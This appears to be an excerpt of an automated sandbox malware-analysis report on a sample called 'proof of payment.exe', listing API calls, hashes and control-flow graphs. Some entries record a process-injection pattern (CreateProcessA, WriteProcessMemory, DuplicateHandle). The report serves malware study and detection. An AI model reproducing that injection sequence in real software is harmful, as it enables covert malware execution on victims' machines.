                                      • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                      • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                      • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat
                                      • String ID:
                                      • API String ID: 493641738-0
                                      • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                      • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                      • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                      • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 100091D0
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 100091E2
                                      • _free.LIBCMT ref: 100091F4
                                      • _free.LIBCMT ref: 10009206
                                      • _free.LIBCMT ref: 10009218
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                      • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                      • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                      • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 1000536F
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 10005381
                                      • _free.LIBCMT ref: 10005394
                                      • _free.LIBCMT ref: 100053A5
                                      • _free.LIBCMT ref: 100053B6
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                      • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                      • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                      • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\proof of payment.exe,00000104), ref: 10004C1D
                                      • _free.LIBCMT ref: 10004CE8
                                      • _free.LIBCMT ref: 10004CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\proof of payment.exe
                                      • API String ID: 2506810119-946216651
                                      • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                      • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                      • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                      • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                      • __freea.LIBCMT ref: 100087D5
                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                      • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                      • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                      • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                      • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                      • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                      • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                      • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 1000655C
                                        • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                        • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                        • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                      • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                      • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: : $Se.
                                      • API String ID: 4218353326-4089948878
                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                        • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: Unknown exception
                                      • API String ID: 3476068407-410509341
                                      • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                      • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                      • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                      • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:9.8%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:211
                                      Total number of Limit Nodes:14
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545774999.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6910000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94d6f5d5b3e4778eb7cee64d644c71b21169e27084e0c23c4d5b0ee017e2e834
                                      • Instruction ID: 67efe72b547e2d8498766f7c89ec03bf02bbaa7e5a99b781d7770bc0d3e31499
                                      • Opcode Fuzzy Hash: 94d6f5d5b3e4778eb7cee64d644c71b21169e27084e0c23c4d5b0ee017e2e834
                                      • Instruction Fuzzy Hash: 9DD05B64C0D248CED7D5FF2058802F566789717210F2C28955409AB602D9204BC2CA94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 524 686f850-686f8e5 526 686f8e7-686f8f1 524->526 527 686f91e-686f93e 524->527 526->527 528 686f8f3-686f8f5 526->528 532 686f977-686f9a6 527->532 533 686f940-686f94a 527->533 530 686f8f7-686f901 528->530 531 686f918-686f91b 528->531 534 686f905-686f914 530->534 535 686f903 530->535 531->527 543 686f9df-686fa99 CreateProcessA 532->543 544 686f9a8-686f9b2 532->544 533->532 537 686f94c-686f94e 533->537 534->534 536 686f916 534->536 535->534 536->531 538 686f950-686f95a 537->538 539 686f971-686f974 537->539 541 686f95e-686f96d 538->541 542 686f95c 538->542 539->532 541->541 546 686f96f 541->546 542->541 555 686faa2-686fb28 543->555 556 686fa9b-686faa1 543->556 544->543 545 686f9b4-686f9b6 544->545 547 686f9b8-686f9c2 545->547 548 686f9d9-686f9dc 545->548 546->539 550 686f9c6-686f9d5 547->550 551 686f9c4 547->551 548->543 550->550 552 686f9d7 550->552 551->550 552->548 566 686fb2a-686fb2e 555->566 567 686fb38-686fb3c 555->567 556->555 566->567 568 686fb30 566->568 569 686fb3e-686fb42 567->569 570 686fb4c-686fb50 567->570 568->567 569->570 571 686fb44 569->571 572 686fb52-686fb56 570->572 573 686fb60-686fb64 570->573 571->570 572->573 574 686fb58 572->574 575 686fb76-686fb7d 573->575 576 686fb66-686fb6c 573->576 574->573 577 686fb94 575->577 578 686fb7f-686fb8e 575->578 576->575 578->577
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0686FA86
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 5bba83066d3672fe27df7058ef1623147975304c7d5cce5f2e46dded311eb1a3
                                      • Instruction ID: 63b4b9fbbdc33f8c4e0903ced6f3bebd230ef225091e6cc2c9c9fa3b283dfa9c
                                      • Opcode Fuzzy Hash: 5bba83066d3672fe27df7058ef1623147975304c7d5cce5f2e46dded311eb1a3
                                      • Instruction Fuzzy Hash: 27917971D00319DFEB60DF69D841BEEBBB2BB48304F1485A9E908E7280DB759985CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 580 c5ae90-c5ae9f 581 c5aea1-c5aeae call c59898 580->581 582 c5aecb-c5aecf 580->582 587 c5aec4 581->587 588 c5aeb0 581->588 584 c5aed1-c5aedb 582->584 585 c5aee3-c5af24 582->585 584->585 591 c5af26-c5af2e 585->591 592 c5af31-c5af3f 585->592 587->582 635 c5aeb6 call c5b118 588->635 636 c5aeb6 call c5b128 588->636 591->592 593 c5af41-c5af46 592->593 594 c5af63-c5af65 592->594 596 c5af51 593->596 597 c5af48-c5af4f call c5a874 593->597 599 c5af68-c5af6f 594->599 595 c5aebc-c5aebe 595->587 598 c5b000-c5b0c0 595->598 601 c5af53-c5af61 596->601 597->601 630 c5b0c2-c5b0c5 598->630 631 c5b0c8-c5b0f3 GetModuleHandleW 598->631 602 c5af71-c5af79 599->602 603 c5af7c-c5af83 599->603 601->599 602->603 605 c5af85-c5af8d 603->605 606 c5af90-c5af92 call c5a884 603->606 605->606 610 c5af97-c5af99 606->610 611 c5afa6-c5afab 610->611 612 c5af9b-c5afa3 610->612 613 c5afad-c5afb4 611->613 614 c5afc9-c5afd6 611->614 612->611 613->614 616 c5afb6-c5afc6 call c5a894 call c5a8a4 613->616 621 c5aff9-c5afff 614->621 622 c5afd8-c5aff6 614->622 616->614 622->621 630->631 632 c5b0f5-c5b0fb 631->632 633 c5b0fc-c5b110 631->633 632->633 635->595 636->595
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00C5B0E6
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: ce5f25921756f543d094ad94947f877b12e6bab5512b3c44ac1e68766c77bce8
                                      • Instruction ID: e9921f37530852ed55373878402ddf9494227a121c78b9c9a63455527da75226
                                      • Opcode Fuzzy Hash: ce5f25921756f543d094ad94947f877b12e6bab5512b3c44ac1e68766c77bce8
                                      • Instruction Fuzzy Hash: D87169B4A00B058FDB24DF6AD04175ABBF1FF88301F008A2DE856D7A50D775E98ACB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 637 c55a84-c55b14
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bca80c09c2272e391c514a2c90a564997d5aefa32e20c916351c896b3530d713
                                      • Instruction ID: bb05fdb41958ab1ad6f07b912df95709e61e3cf3b176bf60c15a71ba5d06c81d
                                      • Opcode Fuzzy Hash: bca80c09c2272e391c514a2c90a564997d5aefa32e20c916351c896b3530d713
                                      • Instruction Fuzzy Hash: E941DDB9C05B48CFEF10CFA4C8557EDBBB0EF06315F20818AC8566B251C775A98ADB45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 640 c5590c-c5598c 642 c5598f-c559d9 CreateActCtxA 640->642 644 c559e2-c55a3c 642->644 645 c559db-c559e1 642->645 652 c55a3e-c55a41 644->652 653 c55a4b-c55a4f 644->653 645->644 652->653 654 c55a51-c55a5d 653->654 655 c55a60 653->655 654->655 657 c55a61 655->657 657->657
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00C559C9
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 29d1bf063858fe63c90e232f686d5e45b892cb481219544aa614d077f483126c
                                      • Instruction ID: f4d1bdff25afee57a160346213f02827cc1763aa778cf903c90cd8923027c721
                                      • Opcode Fuzzy Hash: 29d1bf063858fe63c90e232f686d5e45b892cb481219544aa614d077f483126c
                                      • Instruction Fuzzy Hash: 9241E2B4C00B19CBDB24CFA9C8847DDBBB5BF48304F20856AD459AB251DB75698ACF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 658 4b50bfc-4b542fc 661 4b54302-4b54307 658->661 662 4b543ac-4b543cc call 4b50ad4 658->662 663 4b54309-4b54340 661->663 664 4b5435a-4b54392 CallWindowProcW 661->664 669 4b543cf-4b543dc 662->669 671 4b54342-4b54348 663->671 672 4b54349-4b54358 663->672 667 4b54394-4b5439a 664->667 668 4b5439b-4b543aa 664->668 667->668 668->669 671->672 672->669
                                      APIs
                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B54381
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1544225133.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_4b50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: CallProcWindow
                                      • String ID:
                                      • API String ID: 2714655100-0
                                      • Opcode ID: 301302ee7a03cbf99657312a79193b9f4ea3b6acc5ee2710151eeb6908246c44
                                      • Instruction ID: 48455cd8643d9d1e9aac28ca94e32abc95751c4a8846b2f9d09d0d8307620d0e
                                      • Opcode Fuzzy Hash: 301302ee7a03cbf99657312a79193b9f4ea3b6acc5ee2710151eeb6908246c44
                                      • Instruction Fuzzy Hash: 8D4117B59002059FDB14CF99C448BAAFBF5FF88314F248499E819AB321D375A845CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 675 c5449c-c559d9 CreateActCtxA 679 c559e2-c55a3c 675->679 680 c559db-c559e1 675->680 687 c55a3e-c55a41 679->687 688 c55a4b-c55a4f 679->688 680->679 687->688 689 c55a51-c55a5d 688->689 690 c55a60 688->690 689->690 692 c55a61 690->692 692->692
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00C559C9
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 1c76238b7608b932698d1cae86aeef8ed83532979d65e4de79f298d8668f8d10
                                      • Instruction ID: ac4ec8cec496cdc58cae89ad24849439a6b97ae26384d92a480c4bd657a1052c
                                      • Opcode Fuzzy Hash: 1c76238b7608b932698d1cae86aeef8ed83532979d65e4de79f298d8668f8d10
                                      • Instruction Fuzzy Hash: 6241C3B4C00B1DCBDB24CFA9C844BDEBBB5BF48304F20856AD459AB251DB756989CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 693 c5d421-c5d428 694 c5d3e4-c5d3f4 DuplicateHandle 693->694 695 c5d42a-c5d54e 693->695 696 c5d3f6-c5d3fc 694->696 697 c5d3fd-c5d41a 694->697 696->697
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C5D326,?,?,?,?,?), ref: 00C5D3E7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 214d76b97e3ccab32451aa67a0a669b225d125f67b4ba5a98874c7719d0c3516
                                      • Instruction ID: 32c4b3d076560073d930eaf6c5076f4e6b02934b216e32fb855bec915343b2e6
                                      • Opcode Fuzzy Hash: 214d76b97e3ccab32451aa67a0a669b225d125f67b4ba5a98874c7719d0c3516
                                      • Instruction Fuzzy Hash: CF316B746403808FE704DFA0E845B6E3BA2F7D9311F10853AE9158B3E5CAB8484BEB11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 711 686f5c8-686f616 713 686f626-686f665 WriteProcessMemory 711->713 714 686f618-686f624 711->714 716 686f667-686f66d 713->716 717 686f66e-686f69e 713->717 714->713 716->717
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0686F658
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: a6b82d86b6a7ebc342b1b8dad45d72a1beaa15f45c45252ca4b64c2bbba37581
                                      • Instruction ID: 8e44bbe319ee8808a9f4160d5695ec97c76b0ead575d56b3548889586bb68765
                                      • Opcode Fuzzy Hash: a6b82d86b6a7ebc342b1b8dad45d72a1beaa15f45c45252ca4b64c2bbba37581
                                      • Instruction Fuzzy Hash: EC2157719003099FDF00CFAAC881BDEBBF5FF48310F508429EA19A7250D7799944CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 721 c5ca00-c5d3f4 DuplicateHandle 723 c5d3f6-c5d3fc 721->723 724 c5d3fd-c5d41a 721->724 723->724
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C5D326,?,?,?,?,?), ref: 00C5D3E7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: b17e5bb8ca358f06ff88da44733fe541be935522e7d48aa0911d1aef83c7f426
                                      • Instruction ID: 77342021bb46e6809f1bb6b01949e118a88c5986d12639600778bfce47452025
                                      • Opcode Fuzzy Hash: b17e5bb8ca358f06ff88da44733fe541be935522e7d48aa0911d1aef83c7f426
                                      • Instruction Fuzzy Hash: E321E3B5900349DFDB10CFAAD484AEEBBF4FB48310F14802AE955A7350D379A954CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 727 c5d358-c5d3f4 DuplicateHandle 728 c5d3f6-c5d3fc 727->728 729 c5d3fd-c5d41a 727->729 728->729
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C5D326,?,?,?,?,?), ref: 00C5D3E7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: de41708af4a7a66bb0ee3fd07f1f89e6d4e658472f36a5c4643de5889c2f2b0d
                                      • Instruction ID: ccbef63621dd65516a45be2a920a78cda482ef49e9e6a5fa3f8101dee7034beb
                                      • Opcode Fuzzy Hash: de41708af4a7a66bb0ee3fd07f1f89e6d4e658472f36a5c4643de5889c2f2b0d
